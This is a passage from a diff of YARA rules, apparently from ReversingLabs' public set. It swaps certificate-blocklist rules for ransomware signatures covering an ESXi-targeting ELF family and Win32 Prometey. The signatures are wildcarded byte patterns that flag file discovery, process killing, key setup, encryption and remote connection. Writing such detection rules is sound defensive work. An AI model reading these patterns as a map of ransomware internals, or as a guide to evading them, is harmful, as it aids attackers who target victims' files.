1F 44 00 ?? 48 8B 7C 24 ?? E8 ?? ?? + ?? ?? 48 8D 35 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 89 44 24 ?? 49 89 C4 48 85 C0 + } + $encrypt_files_v2_p2 = { + 0F 84 ?? ?? ?? ?? 31 F6 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 + ?? E8 ?? ?? ?? ?? 48 39 44 24 ?? 48 0F 4E 44 24 ?? 48 8D 7C 24 ?? 48 89 C1 48 C1 F9 + ?? 48 C1 E9 ?? 48 8D 14 08 83 E2 ?? 48 29 CA 48 29 D0 48 89 44 24 ?? E8 ?? ?? ?? ?? + 48 8D BC 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE 48 89 44 24 ?? 31 C0 BA ?? ?? ?? ?? + F3 48 AB 48 8D 84 24 ?? ?? ?? ?? 48 8B 3C 24 48 89 C1 48 89 44 24 ?? E8 ?? ?? ?? ?? + 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89 + EE E8 ?? ?? ?? ?? 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 4C 8D 64 24 ?? 48 + 85 C0 75 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 4D 89 F1 4D 89 E8 4C 89 E9 4C 89 E2 + 48 89 EE 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F6 BA ?? ?? ?? ?? 4C 89 FF 48 F7 + DE E8 ?? ?? ?? ?? 4C 89 F9 4C 89 F2 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 + 24 ?? 4C 29 F0 48 89 44 24 ?? 74 ?? 49 39 C6 4C 8B 7C 24 ?? BE ?? ?? ?? ?? 4C 89 EF + 4C 0F 47 F0 66 0F 6F 4C 24 ?? 4C 89 F9 4C 89 F2 0F 29 4C 24 ?? E8 ?? ?? ?? ?? 4C 39 + F0 74 ?? 48 8B 7C 24 ?? 41 BC ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FE 4C + 89 EF E8 ?? ?? ?? ?? E9 + } + $find_files_v2_p1 = { + 41 57 4D 89 C7 41 56 49 89 FE 41 55 49 89 FD 41 54 55 53 89 CB 48 81 EC ?? ?? ?? ?? + 48 89 34 24 89 54 24 ?? 41 8B 55 ?? 49 83 C5 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? + ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 49 8D 55 ?? 4C 0F 44 EA 89 C6 + 40 00 C6 49 83 DD ?? 31 ED 4D 29 F5 74 ?? 49 8D 6D ?? 43 80 7C 2E ?? ?? 49 0F 45 ED + 48 8D 44 24 ?? 41 89 DC 4C 89 F6 48 89 44 24 ?? 48 89 C2 BF ?? ?? ?? ?? 41 83 E4 ?? + 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 00 83 F8 + ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? 48 8B 44 24 ?? F6 C3 + ?? 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C 89 7C 24 ?? 48 89 44 24 ?? 4D + 85 FF 0F 84 ?? ?? ?? ?? 41 8B 47 ?? 8D 55 ?? 89 54 24 ?? 83 C0 ?? 89 44 24 ?? 89 44 + 24 ?? 41 8B 47 ?? 89 44 24 ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? + ?? ?? 89 D8 83 E0 ?? 89 44 24 ?? 75 ?? 44 88 5C 24 ?? 44 89 E2 48 8D 4C 24 ?? 4C 89 + F7 48 8B 74 24 ?? 48 8B 04 24 44 89 44 24 ?? FF D0 44 8B 44 24 ?? 44 0F B6 5C 24 ?? + 85 C0 89 C2 75 ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 54 24 ?? EB ?? 0F + 1F 44 00 ?? 4D 8B 3F 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 49 39 57 ?? 75 ?? + 31 D2 48 81 C4 ?? ?? ?? ?? 89 D0 5B 5D 41 5C 41 5D 41 5E 41 5F C3 66 90 E8 ?? ?? ?? + ?? 85 C0 78 ?? 8B 44 24 ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? 31 C9 45 31 DB 45 31 E4 48 8B 44 24 ?? F6 C3 ?? 0F 84 ?? ?? + ?? ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C + } + $find_files_v2_p2 = { + 89 7C 24 ?? 48 89 44 24 ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 E8 ?? ?? ?? + ?? 49 89 C4 8B 00 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 F6 BF ?? ?? ?? ?? + E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? EB + ?? 0F 1F 00 8B 4C 24 ?? 85 C9 74 ?? 45 84 DB 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 43 C6 04 + 2E ?? 85 C0 0F 84 ?? ?? ?? ?? 44 89 E2 48 8D 4C 24 ?? 48 8B 74 24 ?? 4C 89 F7 48 8B + 04 24 FF D0 89 C2 E9 ?? ?? ?? ?? 90 31 F6 4C 89 F7 31 C0 44 88 5C 24 ?? E8 ?? ?? ?? + ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 44 0F B6 5C 24 ?? 44 8B 00 85 FF 79 ?? 41 + 83 F8 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? ?? ?? 44 0F 45 DA 44 0F 45 E0 8B 74 + 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 7C 24 ?? 44 88 5C 24 ?? 44 89 44 24 ?? E8 ?? ?? ?? + ?? 44 0F B6 5C 24 ?? 44 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 00 48 89 44 24 ?? 48 8B 44 + 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 85 ED 74 ?? 41 80 3C 2E ?? 48 89 E8 74 ?? E9 ?? + ?? ?? ?? 0F 1F 44 00 ?? 41 80 3C 06 ?? 0F 85 ?? ?? ?? ?? 48 83 E8 ?? 75 ?? 31 D2 89 + } + $find_files_v2_p3 = { + 54 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 89 D8 B9 ?? ?? ?? ?? 41 BB ?? ?? ?? ?? 83 E0 ?? + 83 F8 ?? 45 19 E4 41 83 E4 ?? 41 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 54 24 ?? + 85 D2 0F 88 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 49 89 C7 48 85 C0 0F 84 ?? ?? ?? + ?? B8 ?? ?? ?? ?? 44 89 64 24 ?? 4C 29 E8 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 44 24 + ?? 8B 44 24 ?? 83 E8 ?? 89 44 24 ?? 4C 89 FF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? + ?? 80 78 ?? ?? 74 ?? 4C 8D 60 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 3B 44 24 ?? 0F 83 ?? ?? + ?? ?? 41 C6 04 2E ?? 49 8D 7C 2E ?? 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 8B 54 24 + ?? 89 D9 48 8B 34 24 4C 89 F7 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 FF 89 04 24 E8 ?? ?? + ?? ?? 8B 14 24 E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 74 ?? 66 83 78 ?? ?? 75 ?? EB ?? 90 + 41 80 7C 06 ?? ?? 48 8D 70 ?? 89 C2 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 + 80 7C 06 ?? ?? 48 8D 50 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 89 C2 48 85 D2 0F 84 + ?? ?? ?? ?? 41 80 7C 16 ?? ?? 48 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 00 45 85 E4 0F + 84 ?? ?? ?? ?? 31 C9 45 31 DB 41 BC ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FF 44 8B 64 24 + ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 41 8B 04 24 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 FF + C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? + ?? ?? ?? 48 89 F2 E9 ?? ?? ?? ?? 44 89 04 24 E8 ?? ?? ?? ?? 44 8B 04 24 BA ?? ?? ?? + ?? 44 89 00 E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 83 CA ?? E9 + } + $init_key_v2 = { + 48 85 FF 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 56 41 55 41 54 55 48 89 F5 + 53 48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8D 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? + 66 0F EF C0 48 8D 35 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 49 89 E6 0F 29 04 24 0F 29 44 + 24 ?? E8 ?? ?? ?? ?? 49 89 C5 48 85 C0 74 ?? 4C 89 F7 48 89 C1 BA ?? ?? ?? ?? BE ?? + ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F6 4C 89 E7 E8 + ?? ?? ?? ?? 85 C0 74 ?? 31 C0 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 66 2E + 0F 1F 84 00 ?? ?? 00 00 31 C0 C3 0F 1F 44 00 ?? 48 89 EA 48 89 DE 4C 89 E7 E8 ?? ?? + ?? ?? 85 C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 89 E8 EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Root CA" and pe.signatures[i].serial=="46:9c:3c:c9" and 1308182400<=pe.signatures[i].not_after) + uint32(0)==0x464C457F and ((( all of ($find_files_v1_p*)) and ( all of ($kill_processes_v1_p*)) and ($init_key_v1) and ( all of ($encrypt_files_v1_p*)) and ($shut_down_esxi_v1)) or (( all of ($find_files_v2_p*)) and ( all of ($kill_processes_v2_p*)) and ($init_key_v2) and ( all of ($encrypt_files_v2_p*)))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0A82Bd1E144E8814D75B1A5527Bebf3E : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Prometey : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Prometey ransomware." author = "ReversingLabs" - id = "f3d7d714-8085-524a-814c-ab8cc59ceb4f" - date = "2023-11-08" - modified = "2023-11-08" + id = "a5902fc6-2752-520f-be84-df9ea7b1e27d" + date = "2021-06-07" + modified = "2021-06-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L927-L943" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2534e58ce1e5adbb10dbacb664d40cc32faec341bdb93b926cc85b666cc7b77e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Prometey.yara#L1-L156" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f14c9605e2d375176b461fd396be66754b0ace7dcaada8ca33ad86f6eda10b73" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Prometey" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_p1 = { + 55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3 + ?? ?? ?? ?? 6A ?? 5E 8D 85 ?? ?? ?? ?? 89 75 ?? 50 BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? + ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B 8D 4D ?? 88 5D ?? E8 ?? ?? + ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 + C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 + ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 33 DB 53 53 53 53 50 88 5D + } + $remote_connection_p2 = { + FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 53 56 53 53 6A ?? 68 ?? ?? + ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? + 33 C0 50 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? + 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 + E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? + 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF 75 ?? FF D7 80 7D ?? ?? 74 ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D + ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F + 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? E8 + } + $find_files_p1 = { + 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? + ?? BA ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D 4D ?? 8B D3 C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? + 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? + ?? 33 C0 8D 7D ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? + ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A + ?? 8B 7A ?? 2B CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B + 12 57 52 51 8B CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D + ?? 51 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 7D + ?? 8B 9D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 0F 43 7D ?? 89 8D ?? + ?? ?? ?? 3B D8 77 ?? 85 DB 75 ?? 8B F3 EB ?? 0F BE 09 2B C3 40 89 8D ?? ?? ?? ?? 03 + } + $find_files_p2 = { + C7 89 85 ?? ?? ?? ?? 2B C7 50 51 57 EB ?? 53 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 46 2B C6 50 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? + 8B F0 83 C4 ?? 85 F6 75 ?? 83 CE ?? 33 DB 56 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 89 5D ?? 50 8D 4D ?? 89 5D + ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 7D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 7D ?? 85 D2 74 ?? + 83 C9 ?? 8D 42 ?? 3B C1 0F 42 C8 03 CF EB ?? 2B F7 EB ?? 3B CF 74 ?? 49 80 39 ?? 75 + ?? 2B CF EB ?? 83 C9 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 79 ?? 89 5D ?? C7 45 ?? ?? ?? + ?? ?? 88 5D ?? 3B D7 0F 82 ?? ?? ?? ?? 2B D7 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 + 7D ?? ?? 51 0F 43 45 ?? 8D 4D ?? 03 C7 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC + 8D 45 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B 78 ?? 03 38 3B FB 7D ?? 81 FE ?? ?? ?? ?? 76 ?? 8D + } + $find_files_p3 = { + 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B FB 7D ?? 81 FE ?? ?? ?? ?? + 76 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D + ?? 8D 04 41 50 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? C6 45 + ?? ?? 56 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? C6 45 ?? ?? E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? + ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 51 50 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 56 BA ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 + } + $find_files_p4 = { + 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 + ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 + ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 9D ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? + ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? ?? 03 F3 59 3B F7 75 + ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? ?? 03 F3 3B F7 75 ?? + 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? 59 59 8D 4D ?? E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files = { + 8B FF 55 8B EC 57 FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B F8 8B 49 ?? 90 F6 C1 ?? 75 + ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? E9 + ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 90 C1 E8 ?? A8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? + ?? EB ?? 8B 45 ?? 8B 40 ?? 90 A8 ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 83 61 + ?? ?? 84 C0 8B 45 ?? 74 ?? 8B 48 ?? 89 08 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 + ?? 53 6A ?? 5B 83 C0 ?? F0 09 18 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 ?? 83 60 + ?? ?? 8B 45 ?? 8B 40 ?? 90 A9 ?? ?? ?? ?? 75 ?? 56 8B 75 ?? 6A ?? E8 ?? ?? ?? ?? 59 + 3B F0 74 ?? 8B 75 ?? 53 E8 ?? ?? 